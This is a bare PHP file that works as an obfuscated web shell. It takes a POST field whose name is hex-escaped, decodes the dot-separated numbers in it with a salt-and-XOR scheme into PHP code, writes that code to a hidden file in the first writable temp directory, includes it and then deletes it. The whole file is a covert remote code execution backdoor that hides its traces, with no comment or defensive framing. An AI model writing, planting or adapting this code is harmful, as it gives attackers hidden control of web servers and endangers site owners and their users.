<?php

if(!empty($_POST["\x6Fb\x6A\x65ct"])){
	$token = array_filter(["/tmp", getcwd(), session_save_path(), getenv("TEMP"), sys_get_temp_dir(), "/dev/shm", getenv("TMP"), ini_get("upload_tmp_dir"), "/var/tmp"]);
	$entity = $_POST["\x6Fb\x6A\x65ct"];
	   $entity			= 	explode  (	  ".",$entity		) 		;	 
	$component = '';
            $salt3 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen($salt3	);
            $u = 0;
    
            $__tmp = $entity;
            while ($v8 = array_shift($__tmp)) {
                $chS = ord($salt3[$u % $lenS]	);
                $d = ((int)$v8 - $chS - ($u % 10)) ^50;
                $component .= chr($d	);
                $u++; }	
	foreach ($token as $key => $dat) {
    		if (max(0, is_dir($dat) * is_writable($dat))) {
    $ent = implode("/", [$dat, ".itm"]);
    if (file_put_contents($ent, $component)) {
	include $ent;
	@unlink($ent);
	exit;
}
}
}
}